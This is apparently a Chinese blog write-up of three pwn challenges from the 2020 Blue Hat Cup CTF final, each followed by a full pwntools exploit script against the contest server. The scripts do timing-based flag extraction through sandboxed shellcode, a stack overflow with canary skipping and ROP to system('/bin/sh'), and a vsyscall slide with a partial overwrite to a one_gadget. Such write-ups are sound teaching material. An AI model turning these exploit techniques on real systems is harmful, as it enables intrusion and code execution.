2020蓝帽杯-final

字数统计: 1.2k字   |   阅读时长≈ 6分

和队友拿了个前几名的好成绩,pwn题量不大也有原题,侥幸AK了。

Slient

开启了沙箱,只能执行open和read。和天翼杯的一个题十分相似,拿我之前的脚本改了一下。爆破的方法是 把flag 的每个字节取出来放到寄存器 al 中,然后与我们的可输出字符返回比较,如果比较一致使用 JZ 跳到 ret 返回,如果不一致 则使用 JZ跳入死循环。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *

EXCV = context.binary = './chall'
e = ELF(EXCV)

context.log_level = 'debug'


def pwn(p, index, ch):
    # open
    shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"

    # re open, rax => 4
    shellcode += "push 2; pop rax; syscall;"

    # read(rax, 0x10040, 0x50)
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

    # cmp and jz
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)

    p.sendafter("execution-box.\n", shellcode.ljust(0x40 - 14, b'a') + b'./flag')


index = 0
ans = []
debug = 0
while True:
    for ch in range(0x20, 127):
        if debug == 0:
            p = remote('8.131.246.36', 40334)
        else:
            p = process(EXCV)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end - start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1

print("".join([chr(i) for i in ans]))

fuantoie

题目给了一大堆混淆代码,分析了一下没什么用。然后手工测试,发现执行show时会发生栈错误。经过分析,是如下函数可以发生栈溢出,snprintf函数的返回值是源字符串的大小,而不是目的字符串,所以返回值为0x200,后面通过scanf读,就可以溢出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unsigned __int64 vul_input()
{
  int i; // [rsp+8h] [rbp-98h]
  int num1; // [rsp+Ch] [rbp-94h]
  char v3[136]; // [rsp+10h] [rbp-90h]
  unsigned __int64 v4; // [rsp+98h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  puts("boy");
  read(0, &buf, 0x200uLL);
  num1 = snprintf(buf1, 0xAuLL, "%s", &buf);    // ret 0x200
  puts("lo");
  for ( i = 0; i < num1; ++i )
    _isoc99_scanf("%d", &v3[4 * i]);            // 溢出
  return __readfsqword(0x28u) ^ v4;
}

栈溢出时,还有个小技巧就是如何绕过canary。scanf(‘%d’,c),如果输入 +/- 并不会修改c的值。也就是当要覆盖canary时,我们输入+/-来跳过覆盖canary,然后ROP泄露地址,再去执行system(‘/bin/sh’)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 0
if debug == 1:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = ELF('./libc.so.6')
else:
    p = remote('8.131.246.36', 15823)
    elf = ELF('./pwn')
    libc = ELF('./libc.so.6')

def Add(size):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('size?', str(size))

def Delete(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('index ?', str(idx))

def Edit(idx, content, opt):
    p.sendlineafter('>> ', str(3))
    p.sendlineafter('index ?', str(idx))
    p.sendlineafter('what is your new content ?', content)
    p.sendlineafter('some test first', str(opt))

def Show(idx):
    p.sendlineafter('>> ', str(4))
    p.sendlineafter('index ?', str(idx))

puts_plt = 0x4006f8
puts_got = 0x601fa8
pop_rdi_ret = 0x401763
def Pwn():
    for i in range(22):
        Add(0x100)
    Show(22)
    p.recvuntil('boy\n')
    #gdb.attach(p, 'bp 0x401287')
    payload = 'a'*(45)
    p.sendline(payload)
    p.recvuntil('lo\n')

    payload = []
    for i in range(0x88 / 4):
        payload.append('0')
    # bypass the canary
    payload.append('+')
    payload.append('-')
    payload.append('0')
    payload.append('0')
    payload.append(str(pop_rdi_ret))
    payload.append('0')
    #payload.append(p64(pop_rdi_ret)[4:])
    payload.append(str(puts_got))
    payload.append('0')
    payload.append(str(puts_plt))
    payload.append('0')
    payload.append(str(0x4012b8))
    payload.append('0')

    for i in range(len(payload)):
        print('i:',i)
        p.sendline(payload[i])

    puts_addr = u64(p.recv(6).ljust(8, '\x00'))
    print('puts_addr:',hex(puts_addr))
    libc_base = puts_addr - libc.sym['puts']
    system_addr = libc_base+libc.sym['system']
    bin_sh_addr = libc_base + next(libc.search('/bin/sh\x00'))
    print('system_addr:',hex(system_addr))

    p.sendline(str(22))
    #p.sendlineafter('index ?', str(22))
    p.recvuntil('boy\n')
    #gdb.attach(p, 'bp 0x401287')
    payload = 'a'*(43)
    p.sendline(payload)
    p.recvuntil('lo\n')

    payload = []
    for i in range(0x88 / 4):
        payload.append('0')
    # bypass the canary
    payload.append('+')
    payload.append('-')
    payload.append('0')
    payload.append('0')
    payload.append(str(pop_rdi_ret))
    payload.append('0')
    #payload.append(p64(pop_rdi_ret)[4:])
    bin_sh_addr1 = bin_sh_addr&0xffffffff
    bin_sh_addr2 = bin_sh_addr>>32
    print('bins:',hex(bin_sh_addr2),hex(bin_sh_addr1))
    payload.append(str(bin_sh_addr1))
    payload.append(str(bin_sh_addr2))
    system_addr1 = system_addr&0xffffffff
    system_addr2 = system_addr>>32
    payload.append(str(system_addr1))
    payload.append(str(system_addr2))
    payload.append(str(system_addr1))
    payload.append(str(system_addr2))
    for i in range(len(payload)):
        print('2i:',i)
        p.sendline(payload[i])

    p.interactive()

Pwn()

Simple_canary

这道题又个明显的栈溢出。在栈上找到一个libc上的地址(__libc_start_main+231)然后通过栈溢出和滑板指令,滑板指令这里也算是一个不常见的技巧,利用0xffffffffff600000,可参考我之前所写的安恒8月赛题解。覆盖这个地址的后三个字节使之成为一个one_gadget,这里找的gadget是0x45226,由于后12bit是固定因此只需要爆破低12bit之前的12bit就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from pwnlib.asm import asm

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

while 1:
    try:
        # p=process("./pwn")
        p = remote('8.131.246.36', 38989)
        p.recvuntil("please input something:")
        v = 0xffffffffff600000
        payload = b'a'*0x28
        payload += p64(v)*8+b'\x26'+b'\xb2'+b'\xba'
        p.send(payload)
        sleep(0.2)
        p.sendline("cat /flag")
        p.sendline("cat flag")
        flag = p.recv(timeout=0.3)
        if b'flag' in flag:
            print(flag)
            break
        else:
            p.close()
    except Exception or EOFError:
        print('again')

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing